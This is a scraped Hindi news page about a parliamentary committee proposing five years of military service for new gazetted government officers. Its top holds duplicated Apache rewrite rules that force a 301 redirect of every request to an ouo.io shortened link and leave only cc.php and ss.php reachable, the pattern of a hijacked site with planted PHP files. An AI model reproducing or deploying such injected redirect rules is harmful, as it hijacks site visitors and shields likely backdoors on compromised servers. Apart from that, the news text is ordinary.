
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 724
Previousनई दिल्ली। केंद्र या राज्य सरकार में नौकरी करनी है तो आपको पांच साल तक मिलिट्री सर्विस देनी पड़ सकती है। पार्लियामेंट्री स्टैंडिंग कमेटी ने ये प्रस्ताव दिया है। जिसे संसद में पेश किया गया है। आर्म्ड फोर्सेज में जवानों की कमी को पूरा करने के लिए ये प्रस्ताव भेजा गया है। बता दें कि आर्म्ड फोर्सेज में 40 हजार जवानों की कमी है।
कमेटी ने जो प्रस्ताव दिया है उसमें कहा गया है कि केंद्र और राज्य में गैजेटेड अधिकारी के तौर पर सीधे ज्वॉइन करने वाले लोगों के लिए पांच साल मिलिट्री सर्विस देनी होगी। केंद्रीय नौकरियों में रेलवे के पास 30 लाख से ज्यादा कर्मचारी हैं जबकि राज्य सरकारों में दो करोड़ से ज्यादा लोग काम कर रहे हैं। ऐसे में आने वाले वक्त में जो भी सरकारी नौकरी ज्वॉइन करे उसे निश्चित तौर पर आर्मी सर्विस देने का प्रस्ताव दिया गया है।
पार्लियामेंट्री स्टैंडिंग कमेटी की ये रिपोर्ट हाल ही में संसद में पेश की गई है। प्रस्ताव में कहा गया है कि रक्षा मंत्रालय इस मामले में पर्सनल एंड ट्रेनिंग डिपार्टमेंट के साथ मिलकर काम करे।